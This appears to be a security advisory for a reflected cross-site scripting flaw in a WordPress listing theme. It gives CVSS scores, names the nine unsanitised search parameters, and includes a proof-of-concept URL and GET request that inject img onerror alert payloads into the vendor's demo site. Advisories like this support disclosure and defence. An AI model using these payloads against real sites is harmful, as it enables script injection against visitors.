6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
The theme did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues.
--
[$] ### – [ PoC | Unauthenticated Reflected XSS & XFS | Listing search query: ] [!] https://bello.bold-themes.com/main-demo/listing/?listing_list_view=standard13"-->“>'` -- `<!--<img src=”--><img src=x onerror=(alert)(`listing_list_view`);>&bt;_bb_listing_field_my_lat=13"-->“>'` -- `<!--<img src=”--><img src=x onerror=(alert)(`bt_bb_listing_field_my_lat`);>&bt;_bb_listing_field_my_lng=13"-->“>'` -- `<!--<img src=”--><img src=x onerror=(alert)(`bt_bb_listing_field_my_lng`);>&bt;_bb_listing_field_distance_value=13"-->“>'` -- `<!--<img src=”--><img src=x onerror=(alert)(`bt_bb_listing_field_distance_value`);>&bt;_bb_listing_field_my_lat_default=13&bt;_bb_listing_field_my_lng_default=13&bt;_bb_listing_field_keyword=13"-->“>'` -- `<!--<img src=”--><img src=x onerror=(alert)(`bt_bb_listing_field_keyword`);>&bt;_bb_listing_field_location_autocomplete=13"-->“>'` -- `<!--<img src=”--><img src=x onerror=(alert)(`bt_bb_listing_field_location_autocomplete`);>&bt;_bb_listing_field_category=all&bt;_bb_listing_field_price_range_from=13"-->“>'` -- `<!--<img src=”--><img src=x onerror=(alert)(`bt_bb_listing_field_price_range_from`);>&bt;_bb_listing_field_price_range_to=13"-->“>'` -- `<!--<img src=”--><img src=x onerror=(alert)(`bt_bb_listing_field_price_range_to`);> [!] GET /main-demo/listing/?listing_list_view=standard13%22–%3E%22%3E%27%20--%20
%3C!–%3Cimg%20src=%22–%3E%3Cimg%20src=x%20onerror=(alert)(listing_list_view
);%3E&bt;_bb_listing_field_my_lat=13%22–%3E%22%3E%27%20--%20
%3C!–%3Cimg%20src=%22–%3E%3Cimg%20src=x%20onerror=(alert)(bt_bb_listing_field_my_lat
);%3E&bt;_bb_listing_field_my_lng=13%22–%3E%22%3E%27%20--%20
%3C!–%3Cimg%20src=%22–%3E%3Cimg%20src=x%20onerror=(alert)(bt_bb_listing_field_my_lng
);%3E&bt;_bb_listing_field_distance_value=13%22–%3E%22%3E%27%20--%20
%3C!–%3Cimg%20src=%22–%3E%3Cimg%20src=x%20onerror=(alert)(bt_bb_listing_field_distance_value
);%3E&bt;_bb_listing_field_my_lat_default=13&bt;_bb_listing_field_my_lng_default=13&bt;_bb_listing_field_keyword=13%22–%3E%22%3E%27%20--%20
%3C!–%3Cimg%20src=%22–%3E%3Cimg%20src=x%20onerror=(alert)(bt_bb_listing_field_keyword
);%3E&bt;_bb_listing_field_location_autocomplete=13%22–%3E%22%3E%27%20--%20
%3C!–%3Cimg%20src=%22–%3E%3Cimg%20src=x%20onerror=(alert)(bt_bb_listing_field_location_autocomplete
);%3E&bt;_bb_listing_field_category=all&bt;_bb_listing_field_price_range_from=13%22–%3E%22%3E%27%20--%20
%3C!–%3Cimg%20src=%22–%3E%3Cimg%20src=x%20onerror=(alert)(bt_bb_listing_field_price_range_from
);%3E&bt;_bb_listing_field_price_range_to=13%22–%3E%22%3E%27%20--%20
%3C!–%3Cimg%20src=%22–%3E%3Cimg%20src=x%20onerror=(alert)(bt_bb_listing_field_price_range_to
);%3E HTTP/1.1 Host: bello.bold-themes.com6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N